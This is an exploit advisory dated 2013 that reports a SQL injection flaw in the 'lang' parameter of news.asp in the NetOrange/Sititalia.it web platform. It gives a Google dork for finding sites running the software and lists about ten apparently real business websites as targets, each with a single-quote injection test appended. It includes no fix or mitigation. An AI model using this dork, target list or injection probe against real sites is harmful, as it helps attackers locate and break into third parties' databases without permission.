#******************************************************************************** # Exploit Title : NetOrange - Sititalia.it Sql injection vulnerability # # Powered by : http://www.netorange.it & http://www.sititalia.it # # Exploit Author : Ashiyane Digital Security Team # # Tested on: Windows 7 , Linux # # Google Dork : intext:"Powered by NetOrange - Sititalia.it" # # Date: 2013/08/30 # -------------------------------------------------------------------- # 1- Location : [Target]m/news.asp?lang=[Sql Injection] # # # Proof: # # http://www.astucciatrici.it/news.asp?lang=1' # # http://www.carrozzeriasosioilario.it/news.asp?lang=1' # # http://www.centronova.it/news.asp?lang=1' # # http://www.degliurbani.it/news.asp?lang=1' # # http://www.spiral-conveyor-systems.com//news.asp?lang=1' # # http://www.italmack.it/news.asp?lang=1' # # http://www.starsfa.it/news.asp?lang=1' # # http://www.steelmecsald.com/news.asp?lang=1' # # www.cortiautomazioni.com/news.asp?lang=1' # # http://www.waterjet-outlet.com/news.asp?lang=1' # # ###################### discovered by : ACC3SS ######################